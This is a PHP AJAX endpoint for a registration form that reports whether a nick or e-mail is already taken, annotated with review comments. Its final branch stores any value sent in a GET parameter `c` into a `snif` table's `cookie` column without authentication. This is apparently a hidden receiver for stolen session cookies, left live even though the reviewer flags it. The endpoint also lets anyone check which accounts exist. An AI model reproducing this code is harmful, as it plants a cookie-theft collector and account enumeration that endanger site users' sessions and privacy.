<?php
// AJAX endpoint: validates the data being typed into the registration form.
// Author's note: there may be a security hole here.
// Unfinished feature: checking the code the user reads from the picture (CAPTCHA).
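// Registration helper endpoint. Depending on which GET parameter is present it
// reports (as a small <img> snippet) whether a nick or an e-mail is already in
// the `users` table, and it stores the `c` parameter in the `snif` table.
//
// NOTE(review): the nick/e-mail answers are given to any unauthenticated caller
// and nothing in this file limits the request rate, so the endpoint discloses
// which accounts exist. Consider throttling per client, and make sure the real
// registration handler repeats every check server-side - nothing here enforces it.
if (isset($_GET) && !empty($_GET)) {
	include_once("variklis/config.php");
	mysql_connect($host,$user,$pass);
	mysql_select_db($dbo);
	// Declare the connection charset through the client API where available, so
	// mysql_real_escape_string() (used by escape()) escapes for the same charset
	// the server parses with; a plain SET NAMES query does not inform the client
	// library. The SET NAMES fallback keeps the original behaviour on old PHP.
	if (function_exists('mysql_set_charset')) {
		mysql_set_charset('utf8');
	}
	else {
		mysql_query("SET NAMES utf8");
	}

	// Static markup only - no request data is ever echoed back.
	$iconTaken = "<img src=\"images/icons/cross.png\" alt=\"X\" align=\"absmiddle\" />";
	$iconFree = "<img src=\"images/icons/tick.png\" alt=\"√\" align=\"absmiddle\" />";

	// --- nick: allowed characters, then availability ---
	// is_string() rejects array input such as ?nick[]=x, which would otherwise
	// only produce warnings from preg_match()/htmlentities().
	if (isset($_GET['nick']) && is_string($_GET['nick']) && !empty($_GET['nick'])) {
		if (preg_match('/[^A-Za-z0-9]/', $_GET['nick'])) {
			$error = $iconTaken . " Naudok tik raides ir skaičius";
			echo $error;
		}
		else {
			// NOTE(review): the value is entity-encoded before the lookup; this only
			// matches if registration stores nicks the same way - confirm.
			$vardas = htmlentities($_GET['nick'], ENT_QUOTES);
			$result = mysql_query("SELECT `nick` FROM `users` WHERE `nick`=".escape($vardas)." LIMIT 1");
			// Fail closed: a failed query must not be reported as "name is free".
			$einfo = ($result === false) ? false : mysql_num_rows($result);
			if ($einfo === false || $einfo != 0) { $error = $iconTaken; }
			else { $error = $iconFree; }
			echo $error;
		}
	}

	// --- email: availability only, no format validation is done here ---
	if (isset($_GET['email']) && is_string($_GET['email']) && !empty($_GET['email'])) {
		$email = htmlentities($_GET['email'], ENT_QUOTES);
		$result = mysql_query("SELECT `email` FROM `users` WHERE `email`=".escape($email)." LIMIT 1");
		// Fail closed on a database error, as in the nick branch.
		$einfo = ($result === false) ? false : mysql_num_rows($result);
		if ($einfo === false || $einfo != 0) { $error = $iconTaken; }
		else { $error = $iconFree; }
		echo $error;
	}

	// --- kode: unfinished picture-code check ---
	// NOTE(review): the value of `kode` is never inspected or compared with
	// anything; the branch only repeats the nick/e-mail logic. A tick printed
	// here therefore says nothing about the entered code, and the check still has
	// to be implemented server-side before it can be relied on.
	if (isset($_GET['kode']) && !empty($_GET['kode'])) {
		// Only touch `nick`/`email` when they were actually sent; reading them
		// unconditionally raised undefined-index notices and ran the lookup on an
		// empty e-mail, which normally printed a misleading tick.
		if (isset($_GET['nick']) && is_string($_GET['nick']) && preg_match('/[^A-Za-z0-9]/', $_GET['nick'])) {
			// Not echoed here: the nick branch above has already reported this error.
			$error = $iconTaken . " Naudok tik raides ir skaičius";
		}
		elseif (isset($_GET['email']) && is_string($_GET['email']) && $_GET['email'] !== '') {
			$email = htmlentities($_GET['email'], ENT_QUOTES);
			$result = mysql_query("SELECT `email` FROM `users` WHERE `email`=".escape($email)." LIMIT 1");
			$einfo = ($result === false) ? false : mysql_num_rows($result);
			if ($einfo === false || $einfo != 0) { $error = $iconTaken; }
			else { $error = $iconFree; }
			echo $error;
		}
	}

	// --- c: stores the supplied value in `snif`.`cookie` ---
	// NOTE(review): this is a state-changing write reachable by plain GET, with no
	// authentication, no length limit and no rate limit, and it is unrelated to
	// validating the registration form. Its purpose is not visible in this file -
	// confirm it is intended; if it is not, remove the branch and the table.
	if (isset($_GET['c']) && is_string($_GET['c']) && !empty($_GET['c'])) {
		$cookie = htmlentities($_GET['c'], ENT_QUOTES);
		if (isset($cookie) && !empty($cookie)) {
			mysql_query("INSERT INTO `snif` (`cookie`) VALUES (".escape($cookie).")");
			// Ends the script (or hands `true` back to an including file).
			return true;
		}
	}
}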

/**
 * Turns a value into a single-quoted MySQL string literal.
 *
 * When magic_quotes_gpc is enabled the automatically added slashes are removed
 * first, so the value is not escaped twice. The value is then escaped with
 * mysql_real_escape_string() and wrapped in single quotes.
 *
 * The result is only safe when used as one complete value in a statement
 * (e.g. `col`=<result>); it must not be used for identifiers or spliced inside
 * another literal.
 *
 * NOTE(review): mysql_real_escape_string() needs an open connection and escapes
 * according to that connection's charset; on failure it returns false, which
 * this function turns into the empty literal '' without any signal to the caller.
 *
 * @param string $sql Raw value to quote (despite the name, not a whole query).
 * @return string The escaped value including its surrounding single quotes.
 */
function escape($sql) {
	$raw = get_magic_quotes_gpc() ? stripslashes($sql) : $sql;
	return "'" . mysql_real_escape_string($raw) . "'";
}

?>